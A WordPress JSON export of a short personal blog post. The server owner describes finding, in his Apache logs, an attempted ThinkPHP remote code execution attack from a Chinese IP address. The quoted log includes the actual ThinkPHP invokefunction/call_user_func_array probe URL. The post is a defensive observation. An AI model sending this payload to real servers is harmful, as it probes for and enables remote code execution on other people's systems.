{"id":965,"date":"2020-04-25T13:30:47","date_gmt":"2020-04-25T17:30:47","guid":{"rendered":"https:\/\/blog.lufamily.ca\/kang\/?p=965"},"modified":"2020-04-25T13:30:50","modified_gmt":"2020-04-25T17:30:50","slug":"evidence-of-an-attack","status":"publish","type":"post","link":"https:\/\/blog.lufamily.ca\/kang\/2020\/04\/25\/evidence-of-an-attack\/","title":{"rendered":"Evidence of an Attack"},"content":{"rendered":"\n<p>Today I went about performing my regular server maintenance update and noticed an IP address <code>202.107.188.12<\/code> hitting my Apache web server. Out of pure curiosity I thought I would look up this IP address. After a quick <code>whois<\/code> command, I found out it came from Xinjiang Province, China, specifically from the <a rel=\"noreferrer noopener\" href=\"http:\/\/www.chinanet-online.com\" target=\"_blank\">http:\/\/www.chinanet-online.com<\/a> ISP.<\/p>\n\n\n\n<p>After more investigation, I noticed that this particular visitor was attempting a <a rel=\"noreferrer noopener\" href=\"https:\/\/securitynews.sonicwall.com\/xmlpost\/thinkphp-remote-code-execution-rce-bug-is-actively-being-exploited\/\" target=\"_blank\">ThinkPHP remote code execution<\/a> attack. I don&#8217;t run the ThinkPHP framework. Below is the log recording its attempt.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>202.107.188.12 - - &#91;25\/Apr\/2020:12:58:01 -0400] \"GET \/TP\/public\/index.php HTTP\/1.1\" 302 499 \"-\" \"Mozilla\/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko\/20100115 Firefox\/3.6)\"\n202.107.188.12 - - &#91;25\/Apr\/2020:12:58:05 -0400] \"GET \/TP\/public\/index.php?s=index\/\\\\think\\\\app\/invokefunction&amp;function=call_user_func_array&amp;vars&#91;0]=phpinfo&amp;vars&#91;1]&#91;]=1 HTTP\/1.1\" 302 695 \"-\" \"Mozilla\/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko\/20100115 Firefox\/3.6)\"\n202.107.188.12 - - &#91;25\/Apr\/2020:12:58:08 -0400] \"POST \/TP\/public\/index.php?s=captcha HTTP\/1.1\" 302 519 \"-\" \"Go-http-client\/1.1\"\n202.107.188.12 - - &#91;25\/Apr\/2020:12:58:11 -0400] \"GET \/ HTTP\/1.1\" 302 499 \"-\" \"Mozilla\/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko\/20100115 Firefox\/3.6)\"<\/code><\/pre>\n\n\n\n<p>I have always wondered how many bad actors are out there and whether these bad people will end up attacking my stuff. Well, now I know, having experienced it first hand.<\/p>\n\n\n\n<p>It is a scary place out there.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Today I went about performing my regular server maintenance update and noticed an IP address 202.107.188.12 hitting my Apache web server. Out of pure curiosity I thought I would look up this IP address. After a quick whois command, I found out it came from Xinjiang Province, China, specifically from the http:\/\/www.chinanet-online.com ISP. After more investigation, I &hellip; <a href=\"https:\/\/blog.lufamily.ca\/kang\/2020\/04\/25\/evidence-of-an-attack\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Evidence of an Attack&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-965","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/p7V6i8-fz","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts\/965","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/comments?post=965"}],"version-history":[{"count":1,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts\/965\/revisions"}],"predecessor-version":[{"id":966,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts\/965\/revisions\/966"}],"wp:attachment":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/media?parent=965"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/categories?post=965"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/tags?post=965"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}